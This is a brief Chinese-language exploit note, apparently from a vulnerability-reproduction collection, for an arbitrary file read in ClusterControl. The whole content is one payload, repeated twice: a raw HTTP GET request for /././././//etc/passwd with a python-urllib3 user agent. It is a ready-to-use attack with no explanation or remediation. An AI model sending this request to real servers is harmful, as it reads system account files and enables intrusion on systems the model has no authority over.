C17-1ClusterControl-任意文件读取
漏洞复现:
payload:
GET /././././//etc/passwd HTTP/1.1
Host:
Accept-Encoding: identity
User-Agent: python-urllib3/1.26.4
payload:
GET /././././//etc/passwd HTTP/1.1
Host:
Accept-Encoding: identity
User-Agent: python-urllib3/1.26.4